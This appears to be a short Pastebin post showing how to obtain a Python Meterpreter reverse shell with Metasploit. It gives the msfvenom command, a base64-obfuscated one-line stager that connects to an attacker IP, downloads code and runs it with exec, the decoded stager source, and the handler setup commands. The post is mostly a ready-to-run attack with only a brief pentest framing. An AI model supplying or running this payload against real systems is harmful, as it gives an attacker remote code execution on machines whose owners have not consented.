Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- python Meterpreter Reverse Shell
- by john mahugu
- So not so recently support was added to metasploit for a native python meterpreter. The cool thing about this is that the victim only needs to execute a few small lines of code.
- This means that if you’re performing a local lockdown test and manage to get access to a python shell it wont take much more effort to turn this into a meterpreter session.
- msfvenom -f raw -p python/meterpreter/reverse_tcp LHOST=192.168.90.1 LPORT=1234
- import base64; exec(base64.b64decode('aW1wb3J0IHNvY2tldCxzdHJ1Y3QKcz1zb2NrZXQuc29ja2V0KDIsMSkKcy5jb25uZWN0KCgnMTkyLjE2OC45MC4xJywxMjM0KSkKbD1zdHJ1Y3QudW5wYWNrKCc+SScscy5yZWN2KDQpKVswXQpkPXMucmVjdig0MDk2KQp3aGlsZSBsZW4oZCkhPWw6CglkKz1zLnJlY3YoNDA5NikKZXhlYyhkLHsncyc6c30pCg=='))
- This is just simply python code that is base64 encoded:
- import socket,struct
- s=socket.socket(2,1)
- s.connect(('192.168.90.1',1234))
- l=struct.unpack('>I',s.recv(4))[0]
- d=s.recv(4096)
- while len(d)!=l:
- d+=s.recv(4096)
- exec(d,{'s':s})"
- Then you just need to set up the listener within metasploit and hey presto!
- msf3> use exploit/multi/handler
- msf3> set payload python/meterpreter/reverse_tcp
- msf3> set LHOST 192.168.90.1
- msf3> exploit
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement